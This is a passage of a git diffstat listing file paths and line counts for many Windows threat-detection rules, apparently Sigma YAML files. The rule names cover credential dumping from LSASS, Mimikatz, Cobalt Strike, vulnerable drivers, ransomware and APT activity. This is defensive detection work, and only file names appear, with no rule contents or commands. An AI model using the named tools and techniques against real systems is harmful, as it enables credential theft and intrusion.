...tion_dnscat2_powershell_implementation.yml | 39 + ...tion_win_correlation_multiple_susp_cli.yml | 67 + ...orrelation_susp_builtin_commands_recon.yml | 49 + ...d_cmd_and_powershell_spawned_processes.yml | 41 + ...ess_fake_files_with_stored_credentials.yml | 32 + 
..._party_drivers_exploits_token_stealing.yml | 30 + .../unsupported/win_mal_service_installs.yml | 42 + ...or_impacket_smb_psexec_service_install.yml | 42 + .../unsupported/win_remote_schtask.yml | 39 + ...in_security_global_catalog_enumeration.yml | 30 + .../win_security_rare_schtasks_creations.yml | 29 + ...usp_failed_logons_explicit_credentials.yml | 32 + ...rity_susp_failed_logons_single_process.yml | 34 + ...urity_susp_failed_logons_single_source.yml | 31 + ...rity_susp_failed_logons_single_source2.yml | 33 + ...p_failed_logons_single_source_kerberos.yml | 34 + ..._failed_logons_single_source_kerberos2.yml | 34 + ..._failed_logons_single_source_kerberos3.yml | 34 + ..._susp_failed_logons_single_source_ntlm.yml | 33 + ...susp_failed_logons_single_source_ntlm2.yml | 33 + ...usp_failed_remote_logons_single_source.yml | 33 + ...susp_multiple_files_renamed_or_deleted.yml | 31 + .../win_security_susp_samr_pwset.yml | 29 + .../win_susp_failed_hidden_share_mount.yml | 31 + .../win_system_rare_service_installs.yml | 28 + ...in_taskscheduler_rare_schtask_creation.yml | 28 + .../builtin/win_alert_mimikatz_keywords.yml | 52 + ..._defender_antimalware_platform_expired.yml | 31 + .../win_defender_asr_lsass_access.yml | 49 + .../windefend/win_defender_asr_psexec_wmi.yml | 32 + ...defender_config_change_exclusion_added.yml | 26 + ...der_config_change_exploit_guard_tamper.yml | 39 + ...onfig_change_sample_submission_consent.yml | 33 + .../windefend/win_defender_history_delete.yml | 25 + ...defender_malware_and_pua_scan_disabled.yml | 30 + ..._defender_malware_detected_amsi_source.yml | 26 + ...defender_real_time_protection_disabled.yml | 32 + ...n_defender_real_time_protection_errors.yml | 34 + .../win_defender_restored_quarantine_file.yml | 24 + ...defender_suspicious_features_tampering.yml | 43 + ...win_defender_tamper_protection_trigger.yml | 35 + .../builtin/windefend/win_defender_threat.yml | 28 + .../win_defender_virus_scan_disabled.yml | 30 + 
.../builtin/wmi/win_wmi_persistence.yml | 40 + ...ate_remote_thread_win_hktl_cactustorch.yml | 39 + ...te_remote_thread_win_hktl_cobaltstrike.yml | 31 + .../create_remote_thread_win_keepass.yml | 29 + .../create_remote_thread_win_loadlibrary.yml | 28 + ..._remote_thread_win_mstsc_susp_location.yml | 34 + ...emote_thread_win_password_dumper_lsass.yml | 31 + ...ate_remote_thread_win_powershell_lsass.yml | 35 + ...ote_thread_win_powershell_susp_targets.yml | 38 + .../create_remote_thread_win_ttdinjec.yml | 27 + ...emote_thread_win_uncommon_source_image.yml | 113 + ...emote_thread_win_uncommon_target_image.yml | 63 + .../create_stream_hash_ads_executable.yml | 31 + ...ate_stream_hash_creation_internet_file.yml | 92 + ...haring_domains_download_susp_extension.yml | 68 + ...ing_domains_download_unusual_extension.yml | 64 + ...eate_stream_hash_hktl_generic_download.yml | 244 + ...eate_stream_hash_regedit_export_to_ads.yml | 30 + .../create_stream_hash_susp_ip_domains.yml | 40 + ...stream_hash_winget_susp_package_source.yml | 39 + .../create_stream_hash_zip_tld_download.yml | 47 + ...e_thread_win_susp_remote_thread_target.yml | 39 + .../driver_load_win_mal_creddumper.yml | 44 + .../driver_load_win_mal_poortry_driver.yml | 75 + ...powershell_script_installed_as_service.yml | 32 + ...oad_win_vuln_avast_anti_rootkit_driver.yml | 39 + .../driver_load_win_vuln_dell_driver.yml | 47 + .../driver_load_win_vuln_drivers_names.yml | 372 ++ .../driver_load_win_vuln_gigabyte_driver.yml | 47 + .../driver_load_win_vuln_hw_driver.yml | 52 + .../driver_load_win_vuln_lenovo_driver.yml | 36 + .../file_event_win_hktl_createminidump.yml | 30 + ...nt_win_lsass_memory_dump_file_creation.yml | 32 + ...ile_event_win_mimikatz_memssp_log_file.yml | 30 + .../file_event_win_susp_clr_logs.yml | 42 + ..._alternate_powershell_hosts_moduleload.yml | 41 + .../image_load_side_load_advapi32.yml | 39 + .../deprecated/image_load_side_load_scm.yml | 38 + .../image_load_side_load_svchost_dlls.yml | 39 + 
.../image_load_susp_winword_wmidll_load.yml | 39 + .../net_connection_win_binary_github_com.yml | 36 + .../pipe_created_psexec_pipes_artifacts.yml | 36 + ...ccess_win_in_memory_assembly_execution.yml | 124 + ...ess_win_lazagne_cred_dump_lsass_access.yml | 34 + .../proc_access_win_lsass_susp_access.yml | 174 + ...ss_win_pypykatz_cred_dump_lsass_access.yml | 34 + ...proc_creation_win_apt_apt29_thinktanks.yml | 33 + .../proc_creation_win_apt_dragonfly.yml | 31 + .../proc_creation_win_apt_gallium.yml | 37 + .../proc_creation_win_apt_hurricane_panda.yml | 32 + ...reation_win_apt_lazarus_activity_apr21.yml | 36 + .../proc_creation_win_apt_lazarus_loader.yml | 47 + ..._creation_win_apt_muddywater_dnstunnel.yml | 32 + .../proc_creation_win_apt_ta505_dropper.yml | 31 + ...c_creation_win_certutil_susp_execution.yml | 58 + .../proc_creation_win_cmd_read_contents.yml | 37 + ...oc_creation_win_cmd_redirect_to_stream.yml | 32 + ...tial_acquisition_registry_hive_dumping.yml | 36 + .../proc_creation_win_cscript_vbs.yml | 34 + ...ion_mssql_xp_cmdshell_stored_procedure.yml | 35 + .../proc_creation_win_indirect_cmd.yml | 36 + ...in_indirect_command_execution_forfiles.yml | 48 + ...tion_win_invoke_obfuscation_via_rundll.yml | 33 + ...in_invoke_obfuscation_via_use_rundll32.yml | 38 + ...eation_win_lolbas_execution_of_wuauclt.yml | 37 + .../proc_creation_win_lolbin_findstr.yml | 50 + .../proc_creation_win_lolbin_office.yml | 34 + .../proc_creation_win_lolbin_rdrleakdiag.yml | 34 + ...ion_win_lolbins_by_office_applications.yml | 54 + .../deprecated/proc_creation_win_mal_ryuk.yml | 38 + ...on_win_malware_trickbot_recon_activity.yml | 33 + .../proc_creation_win_mavinject_proc_inj.yml | 29 + .../proc_creation_win_msdt_diagcab.yml | 34 + ...proc_creation_win_new_service_creation.yml | 35 + ...tion_win_nslookup_pwsh_download_cradle.yml | 28 + .../proc_creation_win_odbcconf_susp_exec.yml | 43 + ..._from_proxy_executing_regsvr32_payload.yml | 52 + ...from_proxy_executing_regsvr32_payload2.yml | 
54 + ...on_win_office_spawning_wmi_commandline.yml | 42 + ...creation_win_possible_applocker_bypass.yml | 43 + ...n_powershell_amsi_bypass_pattern_nov22.yml | 35 + ..._powershell_base64_invoke_susp_cmdlets.yml | 46 + ...n_powershell_base64_listing_shadowcopy.yml | 36 + ...eation_win_powershell_base64_shellcode.yml | 29 + .../proc_creation_win_powershell_bitsjob.yml | 36 + ...on_win_powershell_service_modification.yml | 45 + ...ion_win_powershell_xor_encoded_command.yml | 41 + .../proc_creation_win_reg_dump_sam.yml | 35 + .../proc_creation_win_regsvr32_anomalies.yml | 91 + .../proc_creation_win_renamed_paexec.yml | 44 + .../proc_creation_win_renamed_powershell.yml | 36 + .../proc_creation_win_renamed_psexec.yml | 34 + .../proc_creation_win_renamed_rundll32.yml | 27 + ...reation_win_root_certificate_installed.yml | 38 + .../proc_creation_win_run_from_zip.yml | 27 + ...roc_creation_win_sc_delete_av_services.yml | 124 + .../proc_creation_win_schtasks_user_temp.yml | 35 + .../proc_creation_win_service_stop.yml | 50 + .../proc_creation_win_susp_bitstransfer.yml | 34 + ...eation_win_susp_cmd_exectution_via_wmi.yml | 33 + ...oc_creation_win_susp_commandline_chars.yml | 37 + ...c_creation_win_susp_lolbin_non_c_drive.yml | 46 + .../proc_creation_win_susp_run_folder.yml | 42 + ...proc_creation_win_susp_squirrel_lolbin.yml | 87 + ..._sysinternals_psexec_service_execution.yml | 43 + ...eation_win_sysinternals_psexesvc_start.yml | 26 + .../proc_creation_win_whoami_as_system.yml | 33 + .../proc_creation_win_winword_dll_load.yml | 30 + ..._win_wmic_execution_via_office_process.yml | 42 + .../proc_creation_win_wmic_remote_command.yml | 35 + .../proc_creation_win_wmic_remote_service.yml | 37 + .../proc_creation_win_wuauclt_execution.yml | 39 + ..._creation_syncappvpublishingserver_exe.yml | 27 + ...add_sysinternals_sdelete_registry_keys.yml | 29 + ...istry_event_asep_reg_keys_modification.yml | 212 + ...sing_windows_telemetry_for_persistence.yml | 51 + 
.../registry_set_add_hidden_user.yml | 29 + ...ble_microsoft_office_security_features.yml | 41 + .../registry_set_office_security.yml | 32 + .../registry_set_silentprocessexit.yml | 29 + ...napi_in_powershell_credentials_dumping.yml | 32 + .../sysmon_dcom_iertutil_dll_hijack.yml | 33 + .../sysmon_mimikatz_detection_lsass.yml | 43 + ...sysmon_powershell_execution_moduleload.yml | 34 + .../deprecated/sysmon_rclone_execution.yml | 51 + .../win_dsquery_domain_trust_discovery.yml | 32 + .../deprecated/win_susp_esentutl_activity.yml | 35 + .../deprecated/win_susp_rclone_exec.yml | 43 + .../win_susp_vssadmin_ntds_activity.yml | 43 + .../dns_query_win_anonymfiles_com.yml | 30 + .../dns_query/dns_query_win_appinstaller.yml | 33 + ...ns_query_win_cloudflared_communication.yml | 31 + ...dns_query_win_devtunnels_communication.yml | 37 + ...in_dns_server_discovery_via_ldap_query.yml | 49 + ...ery_win_hybridconnectionmgr_servicebus.yml | 28 + .../dns_query_win_mal_cobaltstrike.yml | 38 + .../dns_query/dns_query_win_mega_nz.yml | 30 + .../dns_query_win_regsvr32_dns_query.yml | 33 + ...e_access_software_domains_non_browsers.yml | 173 + .../dns_query_win_susp_external_ip_lookup.yml | 102 + ...eamviewer_domain_query_by_uncommon_app.yml | 33 + .../dns_query_win_tor_onion_domain_query.yml | 30 + .../dns_query_win_ufile_io_query.yml | 30 + ..._query_win_vscode_tunnel_communication.yml | 37 + .../driver_load_win_mal_drivers.yml | 817 +++ .../driver_load_win_mal_drivers_names.yml | 97 + .../driver_load_win_pua_process_hacker.yml | 43 + .../driver_load_win_pua_system_informer.yml | 60 + .../driver_load_win_susp_temp_use.yml | 26 + .../driver_load_win_vuln_drivers.yml | 4460 +++++++++++++++++ .../driver_load_win_vuln_drivers_names.yml | 302 ++ .../driver_load_win_vuln_hevd_driver.yml | 35 + .../driver_load_win_vuln_winring0_driver.yml | 37 + .../driver_load/driver_load_win_windivert.yml | 76 + .../Axiom/proc_creation_win_apt_zxshell.yml | 39 + ...eation_win_apt_turla_commands_critical.yml 
| 37 + ...oc_creation_win_apt_turla_comrat_may20.yml | 38 + ...roc_creation_win_exploit_cve_2015_1641.yml | 31 + ...roc_creation_win_exploit_cve_2017_0261.yml | 33 + ...oc_creation_win_exploit_cve_2017_11882.yml | 35 + ...roc_creation_win_exploit_cve_2017_8759.yml | 34 + .../proc_creation_win_malware_adwind.yml | 35 + .../proc_creation_win_malware_fireball.yml | 35 + ..._access_win_malware_verclsid_shellcode.yml | 38 + .../proc_creation_win_malware_notpetya.yml | 43 + ...n_win_malware_plugx_susp_exe_locations.yml | 102 + .../proc_creation_win_malware_wannacry.yml | 69 + ...oc_creation_win_apt_apt10_cloud_hopper.yml | 34 + .../proc_creation_win_apt_ta17_293a_ps.yml | 32 + ...on_win_apt_lazarus_binary_masquerading.yml | 34 + .../pipe_created_apt_turla_named_pipes.yml | 39 + .../proc_creation_win_malware_elise.yml | 42 + ..._creation_win_apt_apt27_emissary_panda.yml | 36 + .../TA/APT28/proc_creation_win_apt_sofacy.yml | 45 + ...cozy_bear_phishing_campaign_indicators.yml | 35 + ...apt_apt29_phishing_campaign_indicators.yml | 36 + ...c_creation_win_apt_muddywater_activity.yml | 45 + .../proc_creation_win_apt_oilrig_mar18.yml | 57 + .../proc_creation_win_apt_slingshot.yml | 35 + .../proc_creation_win_apt_tropictrooper.yml | 26 + ...roc_creation_win_exploit_other_bearlpe.yml | 36 + ...roc_creation_win_exploit_cve_2019_1378.yml | 44 + ...roc_creation_win_exploit_cve_2019_1388.yml | 38 + .../proc_creation_win_malware_babyshark.yml | 39 + .../proc_creation_win_malware_dridex.yml | 56 + .../proc_creation_win_malware_dtrack.yml | 45 + .../proc_creation_win_malware_emotet.yml | 52 + .../proc_creation_win_malware_formbook.yml | 58 + ...tion_win_malware_lockergoga_ransomware.yml | 30 + .../QBot/proc_creation_win_malware_qbot.yml | 40 + .../Ryuk/proc_creation_win_malware_ryuk.yml | 57 + ...creation_win_malware_snatch_ransomware.yml | 34 + ...c_creation_win_apt_aptc12_bluemushroom.yml | 32 + ...creation_win_apt_apt31_judgement_panda.yml | 43 + 
...c_creation_win_apt_bear_activity_gtr19.yml | 36 + .../proc_creation_win_apt_empiremonkey.yml | 31 + ...ation_win_apt_equationgroup_dll_u_load.yml | 33 + .../proc_creation_win_apt_mustangpanda.yml | 41 + .../proc_creation_win_apt_wocao.yml | 49 + ...oc_creation_win_exploit_cve_2020_10189.yml | 44 + ...roc_creation_win_exploit_cve_2020_1048.yml | 37 + ...roc_creation_win_exploit_cve_2020_1350.yml | 38 + ..._creation_win_malware_blue_mockingbird.yml | 38 + ..._win_malware_emotet_rundll32_execution.yml | 42 + ...creation_win_malware_ke3chang_tidepool.yml | 38 + ...c_creation_win_malware_maze_ransomware.yml | 48 + ...c_creation_win_malware_trickbot_wermgr.yml | 34 + .../proc_creation_win_apt_evilnum_jul20.yml | 34 + .../proc_creation_win_apt_gallium_iocs.yml | 111 + .../proc_creation_win_apt_greenbug_may20.yml | 57 + ...reation_win_apt_lazarus_group_activity.yml | 65 + .../proc_creation_win_apt_unc2452_cmds.yml | 61 + .../proc_creation_win_apt_unc2452_ps.yml | 38 + ...ation_win_apt_unc2452_vbscript_pattern.yml | 35 + .../proc_creation_win_apt_taidoor.yml | 34 + ...c_creation_win_apt_winnti_mal_hk_jan20.yml | 43 + .../proc_creation_win_apt_winnti_pipemon.yml | 35 + ...e_event_win_cve_2021_1675_printspooler.yml | 36 + ...it_cve_2021_26084_atlassian_confluence.yml | 47 + ..._win_exploit_cve_2021_26857_msexchange.yml | 33 + ...le_event_win_cve_2021_26858_msexchange.yml | 42 + ...ation_win_exploit_cve_2021_35211_servu.yml | 36 + .../file_event_win_exploit_cve_2021_40444.yml | 40 + ...oc_creation_win_exploit_cve_2021_40444.yml | 39 + ..._2021_40444_office_directory_traversal.yml | 42 + .../file_event_win_cve_2021_41379_msi_lpe.yml | 35 + ...oc_creation_win_exploit_cve_2021_41379.yml | 42 + ...t_win_cve_2021_44077_poc_default_files.yml | 28 + ...n_win_exploit_other_razorinstaller_lpe.yml | 32 + ...tion_win_exploit_other_systemnightmare.yml | 31 + ...cve_2021_31979_cve_2021_33771_exploits.yml | 43 + ...cve_2021_31979_cve_2021_33771_exploits.yml | 39 + 
...ation_win_malware_blackbyte_ransomware.yml | 40 + .../Conti/proc_creation_win_malware_conti.yml | 34 + .../proc_creation_win_malware_conti_7zip.yml | 31 + ..._win_malware_conti_ransomware_commands.yml | 36 + ...malware_conti_ransomware_database_dump.yml | 40 + ...eation_win_malware_darkside_ransomware.yml | 35 + ...ent_win_malware_devil_bait_script_drop.yml | 36 + ...win_malware_devil_bait_output_redirect.yml | 44 + .../image_load_malware_foggyweb_nobelium.yml | 28 + ...alware_goofy_guineapig_file_indicators.yml | 31 + ...win_malware_goofy_guineapig_broken_cmd.yml | 26 + ...g_googleupdate_uncommon_child_instance.yml | 32 + .../file_event_win_moriya_rootkit.yml | 32 + ...le_event_win_malware_pingback_backdoor.yml | 35 + .../image_load_malware_pingback_backdoor.yml | 35 + ...creation_win_malware_pingback_backdoor.yml | 39 + ...t_win_malware_small_sieve_evasion_typo.yml | 36 + ...eation_win_malware_small_sieve_cli_arg.yml | 27 + ...y_set_malware_small_sieve_evasion_typo.yml | 30 + .../HAFNIUM/proc_creation_win_apt_hafnium.yml | 82 + .../proc_creation_win_apt_revil_kaseya.yml | 51 + .../image_load_usp_svchost_clfsw32.yml | 30 + .../proc_creation_win_apt_sourgrum.yml | 45 + ...win_exploit_cve_2023_21554_queuejumper.yml | 40 + .../file_event_win_cve_2022_24527_lpe.yml | 32 + ...2022_26809_rpcss_child_process_anomaly.yml | 36 + ...eation_win_exploit_cve_2022_29072_7zip.yml | 42 + ..._win_exploit_cve_2022_41120_sysmon_eop.yml | 45 + ...te_remote_thread_win_malware_bumblebee.yml | 33 + ...on_win_malware_hermetic_wiper_activity.yml | 37 + ...raspberry_robin_single_dot_ending_file.yml | 30 + ..._creation_win_apt_actinium_persistence.yml | 33 + .../MERCURY/proc_creation_win_apt_mercury.yml | 31 + ...023_22518_confluence_tomcat_child_proc.yml | 48 + ...ve_2023_23397_outlook_reminder_trigger.yml | 34 + ...ile_event_win_cve_2023_27363_foxit_rce.yml | 32 + ...exploit_cve_2023_34362_moveit_transfer.yml | 69 + ...exploit_cve_2023_36874_report_creation.yml | 37 + 
...exploit_cve_2023_36874_wermgr_creation.yml | 38 + ...win_exploit_cve_2023_36874_fake_wermgr.yml | 32 + ..._office_windows_html_rce_file_patterns.yml | 32 + ..._cve_2023_38331_winrar_susp_double_ext.yml | 33 + ...ploit_cve_2023_38831_winrar_child_proc.yml | 47 + ...t_cve_2023_40477_winrar_rev_file_abuse.yml | 32 + ...loit_other_win_server_undocumented_rce.yml | 36 + ...vent_win_malware_coldsteel_renamed_cmd.yml | 27 + ...malware_coldsteel_service_dll_creation.yml | 28 + ...ware_coldsteel_persistence_service_dll.yml | 29 + ...in_malware_coldsteel_anonymous_process.yml | 30 + ...creation_win_malware_coldsteel_cleanup.yml | 36 + ..._malware_coldsteel_service_persistence.yml | 31 + ...ry_set_malware_coldsteel_created_users.yml | 32 + ...lware_darkgate_autoit3_binary_creation.yml | 41 + ..._autoit3_from_susp_parent_and_location.yml | 42 + ...win_malware_darkgate_net_user_creation.yml | 36 + ..._creation_win_malware_griffon_patterns.yml | 29 + ...ware_icedid_rundll32_dllregisterserver.yml | 31 + ..._win_malware_pikabot_rundll32_activity.yml | 38 + ...re_pikabot_combined_commands_execution.yml | 49 + ...win_malware_pikabot_rundll32_discovery.yml | 37 + ...win_malware_pikabot_rundll32_hollowing.yml | 38 + ...n_malware_qakbot_regsvr32_calc_pattern.yml | 31 + ..._win_malware_qakbot_rundll32_execution.yml | 44 + ...on_win_malware_qakbot_rundll32_exports.yml | 72 + ...are_qakbot_rundll32_fake_dll_execution.yml | 44 + ...win_malware_qakbot_uninstaller_cleanup.yml | 35 + ...alware_rhadamanthys_stealer_dll_launch.yml | 36 + ..._malware_rorschach_ransomware_activity.yml | 37 + ...in_malware_snake_encrypted_payload_ioc.yml | 26 + ...event_win_malware_snake_installers_ioc.yml | 28 + ...nt_win_malware_snake_werfault_creation.yml | 33 + ...n_win_malware_snake_installer_cli_args.yml | 30 + ...ation_win_malware_snake_installer_exec.yml | 38 + ...on_win_malware_snake_service_execution.yml | 28 + ...y_event_malware_snake_covert_store_key.yml | 27 + 
...gistry_set_malware_snake_encrypted_key.yml | 30 + ...win_malware_socgholish_second_stage_c2.yml | 30 + .../dns_query_win_malware_3cx_compromise.yml | 64 + ...e_load_malware_3cx_compromise_susp_dll.yml | 73 + ...ware_3cx_compromise_beaconing_activity.yml | 64 + ...n_win_malware_3cx_compromise_execution.yml | 105 + ...n_malware_3cx_compromise_susp_children.yml | 53 + ...win_malware_3cx_compromise_susp_update.yml | 48 + ...ad_apt_cozy_bear_graphical_proton_dlls.yml | 39 + ...query_win_apt_diamond_steel_indicators.yml | 30 + ...event_win_apt_diamond_sleet_indicators.yml | 33 + ...image_load_apt_diamond_sleet_side_load.yml | 31 + ...ation_win_apt_diamond_sleet_indicators.yml | 26 + ...event_apt_diamond_sleet_scheduled_task.yml | 33 + ...7_powershell_scripts_naming_convention.yml | 28 + ...n_apt_fin7_powertrash_lateral_movement.yml | 35 + ..._event_win_apt_lace_tempest_indicators.yml | 30 + ...pt_lace_tempest_cobalt_strike_download.yml | 28 + ..._win_apt_lace_tempest_loader_execution.yml | 28 + ...ge_load_apt_lazarus_side_load_activity.yml | 41 + ...storm_aspera_faspex_susp_child_process.yml | 121 + ...int_sandstorm_log4j_wstomcat_execution.yml | 29 + ...storm_manage_engine_susp_child_process.yml | 128 + ...ation_win_apt_mustang_panda_indicators.yml | 35 + ...le_event_win_apt_onyx_sleet_indicators.yml | 26 + ...int_management_exploitation_indicators.yml | 40 + ...t_print_management_exploitation_pc_app.yml | 46 + ...ion_win_apt_peach_sandstorm_indicators.yml | 27 + .../file_change_win_2022_timestomping.yml | 48 + ...ge_win_unusual_modification_by_dns_exe.yml | 31 + ...lete_win_cve_2021_1675_print_nightmare.yml | 34 + .../file_delete_win_delete_backup_file.yml | 44 + ...file_delete_win_delete_event_log_files.yml | 29 + ...te_win_delete_exchange_powershell_logs.yml | 30 + ...file_delete_win_delete_iis_access_logs.yml | 31 + ..._win_delete_powershell_command_history.yml | 28 + .../file_delete_win_delete_prefetch.yml | 33 + ...file_delete_win_delete_teamviewer_logs.yml | 
32 + .../file_delete_win_delete_tomcat_logs.yml | 36 + ...win_sysinternals_sdelete_file_deletion.yml | 34 + ...delete_win_unusual_deletion_by_dns_exe.yml | 34 + ...elete_win_zone_identifier_ads_uncommon.yml | 42 + .../file_event_win_access_susp_teams.yml | 31 + ...ile_event_win_access_susp_unattend_xml.yml | 29 + ...n_adsi_cache_creation_by_uncommon_tool.yml | 55 + .../file_event_win_advanced_ip_scanner.yml | 34 + .../file_event_win_anydesk_artefact.yml | 32 + ...vent_win_anydesk_writing_susp_binaries.yml | 34 + .../file_event_win_aspnet_temp_files.yml | 37 + .../file_event_win_bloodhound_collection.yml | 45 + .../file_event_win_crackmapexec_patterns.yml | 63 + ...t_win_create_evtx_non_common_locations.yml | 37 + ...ile_event_win_create_non_existent_dlls.yml | 47 + ...e_event_win_creation_new_shim_database.yml | 34 + ...ile_event_win_creation_scr_binary_file.yml | 37 + .../file_event_win_creation_system_file.yml | 138 + ...ent_win_creation_unquoted_service_path.yml | 29 + ...vent_win_cred_dump_tools_dropped_files.yml | 57 + ...file_event_win_cscript_wscript_dropper.yml | 45 + .../file_event_win_csexec_service.yml | 27 + ...file_event_win_csharp_compile_artefact.yml | 30 + ...ile_event_win_dcom_iertutil_dll_hijack.yml | 34 + ...e_event_win_dll_sideloading_space_path.yml | 35 + ...file_event_win_dump_file_susp_creation.yml | 38 + ...ile_event_win_errorhandler_persistence.yml | 29 + .../file_event_win_exchange_webshell_drop.yml | 40 + ..._win_exchange_webshell_drop_suspicious.yml | 44 + .../file_event_win_gotoopener_artefact.yml | 29 + .../file_event_win_hktl_dumpert.yml | 31 + ...nt_win_hktl_hivenightmare_file_exports.yml | 38 + .../file_event_win_hktl_inveigh_artefacts.yml | 39 + .../file_event_win_hktl_mimikatz_files.yml | 33 + .../file_event/file_event_win_hktl_nppspy.yml | 29 + ...le_event_win_hktl_powerup_dllhijacking.yml | 35 + .../file_event_win_hktl_quarkspw_filedump.yml | 29 + .../file_event_win_hktl_remote_cred_dump.yml | 30 + 
.../file_event_win_hktl_safetykatz.yml | 28 + ...tial_access_dll_search_order_hijacking.yml | 64 + ...e_event_win_install_teamviewer_desktop.yml | 26 + ...ile_event_win_iphlpapi_dll_sideloading.yml | 32 + .../file_event_win_iso_file_mount.yml | 38 + .../file_event_win_iso_file_recent.yml | 36 + ...lbin_gather_network_info_script_output.yml | 36 + ...vent_win_lsass_default_dump_file_names.yml | 59 + .../file_event_win_lsass_shtinkering.yml | 29 + .../file_event_win_lsass_werfault_dump.yml | 29 + .../file_event/file_event_win_mal_adwind.yml | 35 + .../file_event_win_mal_octopus_scanner.yml | 29 + .../file_event_win_msdt_susp_directories.yml | 35 + .../file_event_win_net_cli_artefact.yml | 53 + ...n_new_files_in_uncommon_appdata_folder.yml | 50 + .../file_event_win_new_scr_file.yml | 34 + ...vent_win_notepad_plus_plus_persistence.yml | 37 + .../file_event_win_ntds_dit_creation.yml | 26 + ...t_win_ntds_dit_uncommon_parent_process.yml | 54 + ...le_event_win_ntds_dit_uncommon_process.yml | 51 + .../file_event_win_ntds_exfil_tools.yml | 31 + ...ile_event_win_office_addin_persistence.yml | 42 + ...e_event_win_office_macro_files_created.yml | 36 + ...vent_win_office_macro_files_downloaded.yml | 65 + ...n_office_macro_files_from_susp_process.yml | 49 + ...office_onenote_files_in_susp_locations.yml | 38 + ..._win_office_onenote_susp_dropped_files.yml | 52 + ...vent_win_office_outlook_macro_creation.yml | 34 + .../file_event_win_office_outlook_newform.yml | 33 + ...win_office_outlook_susp_macro_creation.yml | 36 + ...fice_publisher_files_in_susp_locations.yml | 30 + ...e_event_win_office_startup_persistence.yml | 58 + ...e_event_win_office_susp_file_extension.yml | 68 + ...event_win_office_uncommon_file_startup.yml | 70 + .../file_event_win_pcre_net_temp_file.yml | 28 + .../file_event_win_perflogs_susp_files.yml | 44 + ...t_win_powershell_drop_binary_or_script.yml | 56 + ...e_event_win_powershell_drop_powershell.yml | 35 + ...e_event_win_powershell_exploit_scripts.yml | 279 ++ 
...e_event_win_powershell_module_creation.yml | 31 + ...nt_win_powershell_module_susp_creation.yml | 29 + ...in_powershell_module_uncommon_creation.yml | 39 + ...event_win_powershell_startup_shortcuts.yml | 36 + ...licy_test_creation_by_uncommon_process.yml | 39 + .../file_event_win_rclone_config_files.yml | 29 + .../file_event_win_rdp_file_susp_creation.yml | 49 + ...e_event_win_redmimicry_winnti_filedrop.yml | 30 + .../file_event_win_remcom_service.yml | 27 + ...te_access_tools_screenconnect_artefact.yml | 29 + ...access_tools_screenconnect_remote_file.yml | 32 + .../file_event_win_ripzip_attack.yml | 33 + .../file_event/file_event_win_sam_dump.yml | 51 + ...e_event_win_shell_write_susp_directory.yml | 51 + ..._win_shell_write_susp_files_extensions.yml | 59 + ...le_event_win_startup_folder_file_write.yml | 34 + .../file_event_win_susp_colorcpl.yml | 33 + ...ile_event_win_susp_creation_by_mobsync.yml | 33 + ...e_event_win_susp_default_gpo_dir_write.yml | 29 + .../file_event_win_susp_desktop_ini.yml | 38 + .../file_event_win_susp_desktop_txt.yml | 30 + ..._event_win_susp_desktopimgdownldr_file.yml | 39 + .../file_event_win_susp_diagcab.yml | 25 + .../file_event_win_susp_double_extension.yml | 59 + ...ile_event_win_susp_exchange_aspx_write.yml | 31 + ...ile_event_win_susp_executable_creation.yml | 35 + .../file_event_win_susp_get_variable.yml | 32 + ...t_win_susp_hidden_dir_index_allocation.yml | 35 + ...file_event_win_susp_homoglyph_filename.yml | 82 + ...n_susp_legitimate_app_dropping_archive.yml | 57 + ...t_win_susp_legitimate_app_dropping_exe.yml | 49 + ...in_susp_legitimate_app_dropping_script.yml | 52 + ...le_event_win_susp_lnk_double_extension.yml | 62 + .../file_event_win_susp_pfx_file_creation.yml | 32 + ...file_event_win_susp_powershell_profile.yml | 35 + ...cexplorer_driver_created_in_tmp_folder.yml | 36 + ...e_event_win_susp_recycle_bin_fake_exec.yml | 38 + ...vent_win_susp_spool_drivers_color_drop.yml | 29 + ...nt_win_susp_startup_folder_persistence.yml 
| 42 + ...win_susp_system_interactive_powershell.yml | 30 + .../file_event_win_susp_task_write.yml | 32 + ...ent_win_susp_teamviewer_remote_session.yml | 32 + ...ent_win_susp_vscode_powershell_profile.yml | 31 + ...vent_win_susp_windows_terminal_profile.yml | 35 + ..._event_win_susp_winsxs_binary_creation.yml | 34 + ..._sysinternals_livekd_default_dump_name.yml | 26 + ...e_event_win_sysinternals_livekd_driver.yml | 29 + ...sinternals_livekd_driver_susp_creation.yml | 33 + ...internals_procexp_driver_susp_creation.yml | 37 + ...internals_procmon_driver_susp_creation.yml | 32 + ..._event_win_sysinternals_psexec_service.yml | 32 + ...nt_win_sysinternals_psexec_service_key.yml | 35 + ...em32_local_folder_privilege_escalation.yml | 35 + .../file_event_win_taskmgr_lsass_dump.yml | 32 + ...e_event_win_tsclient_filewrite_startup.yml | 26 + ..._event_win_uac_bypass_consent_comctl32.yml | 29 + ...e_event_win_uac_bypass_dotnet_profiler.yml | 29 + .../file_event_win_uac_bypass_eventvwr.yml | 36 + ...ent_win_uac_bypass_idiagnostic_profile.yml | 30 + .../file_event_win_uac_bypass_ieinstal.yml | 31 + ...file_event_win_uac_bypass_msconfig_gui.yml | 29 + ...vent_win_uac_bypass_ntfs_reparse_point.yml | 29 + .../file_event_win_uac_bypass_winsat.yml | 31 + .../file_event_win_uac_bypass_wmp.yml | 32 + ...le_event_win_vhd_download_via_browsers.yml | 46 + ...scode_tunnel_remote_creation_artefacts.yml | 28 + ...nt_win_vscode_tunnel_renamed_execution.yml | 32 + ...ile_event_win_webshell_creation_detect.yml | 56 + .../file_event_win_werfault_dll_hijacking.yml | 34 + .../file_event_win_winrm_awl_bypass.yml | 36 + ...ersistence_script_event_consumer_write.yml | 27 + ...ile_event_win_wmiexec_default_filename.yml | 30 + ...event_win_wmiprvse_wbemcomn_dll_hijack.yml | 30 + .../file_event_win_wpbbin_persistence.yml | 28 + ...le_event_win_writing_local_admin_share.yml | 31 + ...load_cmstp_load_dll_from_susp_location.yml | 37 + ...image_load_dll_amsi_suspicious_process.yml | 33 + 
